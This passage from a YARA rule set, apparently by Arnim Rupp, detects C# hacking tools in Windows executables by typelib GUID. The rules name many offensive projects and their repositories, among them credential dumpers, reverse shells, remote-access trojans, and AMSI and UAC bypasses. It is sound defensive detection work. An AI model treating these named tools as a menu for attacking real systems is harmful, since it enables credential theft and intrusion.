"3412fbe9-19d3-41d8-9ad2-6461fcb394dc" ascii nocase wide $typelibguid7 = "9ea4e0dc-9723-4d93-85bb-a4fcab0ad210" ascii nocase wide $typelibguid8 = "6d2b239c-ba1e-43ec-8334-d67d52b77181" ascii nocase wide $typelibguid9 = "42e8b9e1-0cf4-46ae-b573-9d0563e41238" ascii nocase wide $typelibguid10 = "0d15e0e3-bcfd-4a85-adcd-0e751dab4dd6" ascii nocase wide $typelibguid11 = "644dfd1a-fda5-4948-83c2-8d3b5eda143a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 
0x00004550) and any of them } rule HKTL_NET_GUID_SHAPESHIFTER { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/matterpreter/SHAPESHIFTER" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a3ddfcaa-66e7-44fd-ad48-9d80d1651228" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Evasor { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cyberark/Evasor" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1c8849ef-ad09-4727-bf81-1f777bd1aef8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Stracciatella { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/mgeeky/Stracciatella" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "eaafa0ac-e464-4fc4-9713-48aa9a6716fb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_logger { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/xxczaki/logger" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9e92a883-3c8b-4572-a73e-bb3e61cfdc16" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Internal_Monologue { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/eladshamir/Internal-Monologue" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0c0333db-8f00-4b68-b1db-18a9cacc1486" ascii nocase wide $typelibguid1 = "84701ace-c584-4886-a3cf-76c57f6e801a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_GRAT2 { meta: 
description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/r3nhat/GRAT2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5e7fce78-1977-444f-a18e-987d708a2cff" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_PowerShdll { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/p3nt4/PowerShdll" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "36ebf9aa-2f37-4f1d-a2f1-f2a45deeaf21" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_CsharpAmsiBypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/WayneJLee/CsharpAmsiBypass" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4ab3b95d-373c-4197-8ee3-fe0fa66ca122" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HastySeries { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/obscuritylabs/HastySeries" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8435531d-675c-4270-85bf-60db7653bcf6" ascii nocase wide $typelibguid1 = "47db989f-7e33-4e6b-a4a5-c392b429264b" ascii nocase wide $typelibguid2 = "300c7489-a05f-4035-8826-261fa449dd96" ascii nocase wide $typelibguid3 = "41bf8781-ae04-4d80-b38d-707584bf796b" ascii nocase wide $typelibguid4 = "620ed459-18de-4359-bfb0-6d0c4841b6f6" ascii nocase wide $typelibguid5 = "91e7cdfe-0945-45a7-9eaa-0933afe381f2" ascii nocase wide $typelibguid6 = "c28e121a-60ca-4c21-af4b-93eb237b882f" ascii nocase wide $typelibguid7 = "698fac7a-bff1-4c24-b2c3-173a6aae15bf" ascii nocase wide $typelibguid8 = "63a40d94-5318-42ad-a573-e3a1c1284c57" ascii nocase wide $typelibguid9 = "56b8311b-04b8-4e57-bb58-d62adc0d2e68" 
ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DreamProtectorFree { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Paskowsky/DreamProtectorFree" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f7e8a902-2378-426a-bfa5-6b14c4b40aa3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RedSharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/padovah4ck/RedSharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "30b2e0cf-34dd-4614-a5ca-6578fb684aea" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_ESC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NetSPI/ESC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "06260ce5-61f4-4b81-ad83-7d01c3b37921" ascii nocase wide $typelibguid1 = "87fc7ede-4dae-4f00-ac77-9c40803e8248" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Csharp_Loader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Csharp-Loader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5fd7f9fc-0618-4dde-a6a0-9faefe96c8a1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_bantam { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/gellin/bantam" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "14c79bda-2ce6-424d-bd49-4f8d68630b7b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 
0x00004550) and any of them } rule HKTL_NET_GUID_SharpTask { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpTask" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "13e90a4d-bf7a-4d5a-9979-8b113e3166be" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WindowsPlague { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/RITRedteam/WindowsPlague" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "cdf8b024-70c9-413a-ade3-846a43845e99" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Misc_CSharp { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/Misc-CSharp" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "d1421ba3-c60b-42a0-98f9-92ba4e653f3d" ascii nocase wide $typelibguid1 = "2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpSpray { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/jnqpblc/SharpSpray" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "51c6e016-1428-441d-82e9-bb0eb599bbc8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Obfuscator { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/3xpl01tc0d3r/Obfuscator" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8fe5b811-a2cb-417f-af93-6a3cf6650af1" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SafetyKatz { meta: 
description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SafetyKatz" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Dropless_Malware { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Dropless-Malware" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "23b739f7-2355-491e-a7cd-a8485d39d6d6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UAC_SilentClean { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/EncodeGroup/UAC-SilentClean" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "948152a4-a4a1-4260-a224-204255bfee72" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DesktopGrabber { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/DesktopGrabber" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "e6aa0cd5-9537-47a0-8c85-1fbe284a4380" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_wsManager { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/guillaC/wsManager" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9480809e-5472-44f3-b076-dcdf7379e766" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_UglyEXe { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/fashionproof/UglyEXe" 
author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "233de44b-4ec1-475d-a7d6-16da48d6fc8d" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SharpDump" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "79c9bba3-a0ea-431c-866c-77004802d8a0" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_EducationalRAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/securesean/EducationalRAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8a18fbcf-8cac-482d-8ab7-08a44f0e278e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Stealth_Kid_RAT { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/ctsecurity/Stealth-Kid-RAT" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "bf43cd33-c259-4711-8a0e-1a5c6c13811d" ascii nocase wide $typelibguid1 = "e5b9df9b-a9e4-4754-8731-efc4e2667d88" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCradle { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/anthemtotheego/SharpCradle" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "f70d2b71-4aae-4b24-9dae-55bc819c78bb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BypassUAC { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cnsimo/BypassUAC" author = "Arnim Rupp" date = "2020-12-13" strings: 
$typelibguid0 = "4e7c140d-bcc4-4b15-8c11-adb4e54cc39a" ascii nocase wide $typelibguid1 = "cec553a7-1370-4bbc-9aae-b2f5dbde32b0" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_hanzoInjection { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/P0cL4bs/hanzoInjection" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "32e22e25-b033-4d98-a0b3-3d2c3850f06c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_clr_meterpreter { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/OJ/clr-meterpreter" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "6840b249-1a0e-433b-be79-a927696ea4b3" ascii nocase wide $typelibguid1 = "67c09d37-ac18-4f15-8dd6-b5da721c0df6" ascii nocase wide $typelibguid2 = "e05d0deb-d724-4448-8c4c-53d6a8e670f3" ascii nocase wide $typelibguid3 = "c3cc72bf-62a2-4034-af66-e66da73e425d" ascii nocase wide $typelibguid4 = "7ace3762-d8e1-4969-a5a0-dcaf7b18164e" ascii nocase wide $typelibguid5 = "3296e4a3-94b5-4232-b423-44f4c7421cb3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BYTAGE { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/KNIF/BYTAGE" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8e46ba56-e877-4dec-be1e-394cb1b5b9de" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_MultiOS_ReverseShell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/belane/MultiOS_ReverseShell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "df0dd7a1-9f6b-4b0f-801e-e17e73b0801d" ascii nocase 
wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HideFromAMSI { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/0r13lc0ch4v1/HideFromAMSI" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "b91d2d44-794c-49b8-8a75-2fbec3fe3fe3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DotNetAVBypass_Master { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/lockfale/DotNetAVBypass-Master" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4854c8dc-82b0-4162-86e0-a5bbcbc10240" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpDPAPI { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/SharpDPAPI" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "5f026c27-f8e6-4052-b231-8451c6a73838" ascii nocase wide $typelibguid1 = "2f00a05b-263d-4fcc-846b-da82bd684603" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Telegra_Csharp_C2 { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/sf197/Telegra_Csharp_C2" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1d79fabc-2ba2-4604-a4b6-045027340c85" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpCompile { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/SpiderLabs/SharpCompile" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "63f81b73-ff18-4a36-b095-fdcb4776da4c" ascii nocase wide condition: (uint16(0) == 
0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Carbuncle { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/checkymander/Carbuncle" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3f239b73-88ae-413b-b8c8-c01a35a0d92e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_OSSFileTool { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/B1eed/OSSFileTool" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "207aca5d-dcd6-41fb-8465-58b39efcde8b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Rubeus { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/GhostPack/Rubeus" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "658c8b7f-3664-4a95-9572-a3e5871dfc06" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Simple_Loader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/cribdragg3r/Simple-Loader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "035ae711-c0e9-41da-a9a2-6523865e8694" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Minidump { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/3xpl01tc0d3r/Minidump" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "15c241aa-e73c-4b38-9489-9a344ac268a3" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpBypassUAC { meta: description = "Detects c# red/black-team 
tools via typelibguid" reference = "https://github.com/FatRodzianko/SharpBypassUAC" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "0d588c86-c680-4b0d-9aed-418f1bb94255" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_SharpPack { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Lexus89/SharpPack" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid1 = "b59c7741-d522-4a41-bf4d-9badddebb84a" ascii nocase wide $typelibguid2 = "fd6bdf7a-fef4-4b28-9027-5bf750f08048" ascii nocase wide $typelibguid3 = "6dd22880-dac5-4b4d-9c91-8c35cc7b8180" ascii nocase wide $typelibguid5 = "f3037587-1a3b-41f1-aa71-b026efdb2a82" ascii nocase wide $typelibguid6 = "41a90a6a-f9ed-4a2f-8448-d544ec1fd753" ascii nocase wide $typelibguid7 = "3787435b-8352-4bd8-a1c6-e5a1b73921f4" ascii nocase wide $typelibguid8 = "fdd654f5-5c54-4d93-bf8e-faf11b00e3e9" ascii nocase wide $typelibguid9 = "aec32155-d589-4150-8fe7-2900df4554c8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Salsa_tools { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Hackplayers/Salsa-tools" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "276004bb-5200-4381-843c-934e4c385b66" ascii nocase wide $typelibguid1 = "cfcbf7b6-1c69-4b1f-8651-6bdb4b55f6b9" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_WindowsDefender_Payload_Downloader { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/notkohlrexo/WindowsDefender-Payload-Downloader" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "2f8b4d26-7620-4e11-b296-bc46eba3adfc" ascii nocase wide condition: (uint16(0) == 0x5A4D and 
uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Privilege_Escalation { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/Mrakovic-ORG/Privilege_Escalation" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "ed54b904-5645-4830-8e68-52fd9ecbb2eb" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Marauder { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/maraudershell/Marauder" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "fff0a9a3-dfd4-402b-a251-6046d765ad78" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_AV_Evasion_Tool { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/1y0n/AV_Evasion_Tool" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "1937ee16-57d7-4a5f-88f4-024244f19dc6" ascii nocase wide $typelibguid1 = "7898617d-08d2-4297-adfe-5edd5c1b828b" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Fenrir { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/nccgroup/Fenrir" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "aecec195-f143-4d02-b946-df0e1433bd2e" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_StormKitty { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/LimerBoy/StormKitty" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "a16abbb4-985b-4db2-a80c-21268b26c73d" ascii nocase wide $typelibguid1 = "98075331-1f86-48c8-ae29-29da39a8f98b" ascii nocase wide condition: (uint16(0) 
== 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Crypter_Runtime_AV_s_bypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/netreverse/Crypter-Runtime-AV-s-bypass" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c25e39a9-8215-43aa-96a3-da0e9512ec18" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_RunAsUser { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/atthacks/RunAsUser" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9dff282c-93b9-4063-bf8a-b6798371d35a" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_HWIDbypass { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/yunseok/HWIDbypass" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "47e08791-d124-4746-bc50-24bd1ee719a6" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_XORedReflectiveDLL { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/r3nhat/XORedReflectiveDLL" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "c0e49392-04e3-4abb-b931-5202e0eb4c73" ascii nocase wide $typelibguid1 = "30eef7d6-cee8-490b-829f-082041bc3141" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Sharp_Suite { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/FuzzySecurity/Sharp-Suite" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "467ee2a9-2f01-4a71-9647-2a2d9c31e608" ascii nocase wide $typelibguid1 = 
"5611236e-2557-45b8-be29-5d1f074d199e" ascii nocase wide $typelibguid2 = "447edefc-b429-42bc-b3bc-63a9af19dbd6" ascii nocase wide $typelibguid3 = "eacaa2b8-43e5-4888-826d-2f6902e16546" ascii nocase wide $typelibguid4 = "a3b7c697-4bb6-455d-9fda-4ab54ae4c8d2" ascii nocase wide $typelibguid5 = "a5f883ce-1f96-4456-bb35-40229191420c" ascii nocase wide $typelibguid6 = "28978103-d90d-4618-b22e-222727f40313" ascii nocase wide $typelibguid7 = "252676f8-8a19-4664-bfb8-5a947e48c32a" ascii nocase wide $typelibguid8 = "414187db-5feb-43e5-a383-caa48b5395f1" ascii nocase wide $typelibguid9 = "0c70c839-9565-4881-8ea1-408c1ebe38ce" ascii nocase wide $typelibguid10 = "0a382d9a-897f-431a-81c2-a4e08392c587" ascii nocase wide $typelibguid11 = "629f86e6-44fe-4c9c-b043-1c9b64be6d5a" ascii nocase wide $typelibguid12 = "f0d28809-b712-4380-9a59-407b7b2badd5" ascii nocase wide $typelibguid13 = "956a5a4d-2007-4857-9259-51cd0fb5312a" ascii nocase wide $typelibguid14 = "53f622eb-0ca3-4e9b-9dc8-30c832df1c7b" ascii nocase wide $typelibguid15 = "72019dfe-608e-4ab2-a8f1-66c95c425620" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_rat_shell { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/stphivos/rat-shell" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "7a15f8f6-6ce2-4ca4-919d-2056b70cc76a" ascii nocase wide $typelibguid1 = "1659d65d-93a8-4bae-97d5-66d738fc6f6c" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_dotnet_gargoyle { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/countercept/dotnet-gargoyle" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "76435f79-f8af-4d74-8df5-d598a551b895" ascii nocase wide $typelibguid1 = "5a3fc840-5432-4925-b5bc-abc536429cb5" ascii nocase wide $typelibguid2 = 
"6f0bbb2a-e200-4d76-b8fa-f93c801ac220" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_aresskit { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/BlackVikingPro/aresskit" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "8dca0e42-f767-411d-9704-ae0ba4a44ae8" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_DLL_Injector { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/tmthrgd/DLL-Injector" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "4581a449-7d20-4c59-8da2-7fd830f1fd5e" ascii nocase wide $typelibguid1 = "05f4b238-25ce-40dc-a890-d5bbb8642ee4" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_TruffleSnout { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/dsnezhkov/TruffleSnout" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "33842d77-bce3-4ee8-9ee2-9769898bb429" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_Anti_Analysis { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/NYAN-x-CAT/Anti-Analysis" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "3092c8df-e9e4-4b75-b78e-f81a0058a635" ascii nocase wide condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and any of them } rule HKTL_NET_GUID_BackNet { meta: description = "Detects c# red/black-team tools via typelibguid" reference = "https://github.com/valsov/BackNet" author = "Arnim Rupp" date = "2020-12-13" strings: $typelibguid0 = "9fdae122-cd1e-467d-a6fa-a98c26e76348" ascii nocase wide $typelibguid1 
